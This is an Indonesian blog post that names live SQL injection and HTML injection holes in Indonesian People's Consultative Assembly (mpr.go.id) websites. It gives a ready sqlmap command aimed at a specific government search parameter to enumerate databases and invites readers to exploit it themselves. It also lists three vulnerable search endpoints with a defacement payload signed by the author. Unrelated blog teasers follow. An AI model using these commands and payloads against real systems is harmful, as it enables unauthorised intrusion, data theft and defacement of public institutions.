Langsung ke konten utama

Website Majelis Perwakilan Rakyat (MPR) Vulnerable

Gambar
Oleh

Apa itu Sql Injection dan HTML Injection??.

SQLI singkatnya adalah teknik yang menyalahgunakan celah yang terjadi dalam lapisan database aplikasi atau website.

HTML Injection sebenarnya masih kakak adek dengan Cross Site Scripting (XSS). yaitu celah keamanan untuk menginjeksi kode HTML ke dalam halaman website...lob loh...buat apa kaka?...(baca: guugel.com)

kemungkinan teman-teman sudah tidak asing dengan method (metode) tersebut, jadi langsung saja tanpa basah basah basi...cokicokicroot.

A. ppid.mpr.go.id SQL Injection

1. akses website :

ppid.mpr.go.id/id

2. arahkan ke url :

https://ppid.mpr.go.id/berita/semuaberita?cari=

3. pastinya kita perlu mencheck respon dari webs tersebut apakah true atau false, dengan memasukan tanda (').

4. Tinggal mengeseks_usi dengan SQLMAP

command sqlmap :

python sqlmap.py -u https://ppid.mpr.go.id/berita/semuaberita?cari=12 --dbs --random-agent --flush-session --technique=BEUS --time-sec=2 --tamper=space2comment --ignore-proxy --dbms=mysql

5. Silahkan mengeseks_usi sendiri...cokicokicroot

B. HTML Injection Domain mpr.go.id

Domain Vulnerable :

1. https://jdih.mpr.go.id/halaman/cari?q=

2. https://www.mpr.go.id/halaman/cari?q=

3. https://v1.mpr.go.id/halaman/cari?q=

4. Injeksi Kodenya

"><marquee><center><font face="courier new" color="green">Ngehek By Ceeroot</font></marquee>"

contoh :

https://www.mpr.go.id/halaman/cari?q=%3Cmarquee%3E%3Ccenter%3E%3Cfont%20face=%22courier%20new%22%20color=%22green%22%3ENgehek%20By%20Ceeroot%3C/font%3E%3C/marquee%3E



Komentar

Posting Komentar

Postingan populer dari blog ini

Mengeksplorasi Jejak Sejarah: 10 Situs Web untuk Mencari Sumber Naskah di Zaman Kolonialisme di Indonesia

Oleh
Indonesia, dengan warisan sejarah yang kaya dan kompleks, telah melalui masa kolonialisme yang panjang yang telah membentuk perkembangan politik, sosial, dan budayanya. Untuk memahami lebih dalam tentang periode kolonialisme ini, penting bagi peneliti, sejarawan, dan masyarakat umum untuk memiliki akses yang luas terhadap sumber-sumber naskah dan dokumen yang relevan. Di era digital ini, banyak lembaga dan institusi telah memperluas akses terhadap koleksi mereka melalui platform daring. Dalam artikel ini, kami akan menjelajahi sepuluh situs web yang menyediakan sumber-sumber naskah di zaman kolonialisme di Indonesia. 1. Arsip Nasional Republik Indonesia (ANRI):    Sebagai rumah bagi banyak dokumen bersejarah, ANRI memiliki koleksi yang mencakup periode kolonialisme di Indonesia. Dari arsip foto hingga catatan resmi pemerintah kolonial, situs web ANRI menawarkan akses yang berharga bagi mereka yang ingin mempelajari lebih lanjut tentang masa lalu Indonesia. 2. Perpustakaan Nasi...
Posting Komentar
Baca Selengkapnya »

Semua tentang PPPK - Download Materi Ebook PDF PPPK 2024-2025

Oleh
Panduan Lengkap Mendownload Ebook PPPK Seleksi Pegawai Pemerintah dengan Perjanjian Kerja (PPPK) merupakan kesempatan emas bagi banyak orang yang ingin mengabdi pada negara. Setiap tahun, ribuan posisi PPPK dibuka, memberikan peluang bagi banyak calon tenaga profesional untuk bekerja di sektor publik. Namun, untuk berhasil lolos seleksi, dibutuhkan persiapan matang dan pemahaman mendalam tentang apa yang akan dihadapi dalam ujian. Salah satu cara terbaik untuk mempersiapkan diri adalah dengan memanfaatkan sumber daya belajar yang ada, seperti ebook PPPK. Dalam artikel ini, kita akan membahas mengapa mendownload ebook PPPK bisa menjadi langkah cerdas untuk persiapan ujian dan bagaimana cara mendapatkan ebook tersebut dengan mudah. Yuk, simak informasi lengkapnya! Apa Itu PPPK? Sebelum membahas lebih jauh tentang ebook PPPK, penting untuk memahami terlebih dahulu apa itu PPPK dan mengapa seleksi ini begitu penting. PPPK adalah sistem penerimaan pegawai pemerintah yang berbeda dari CPN...
Posting Komentar
Baca Selengkapnya »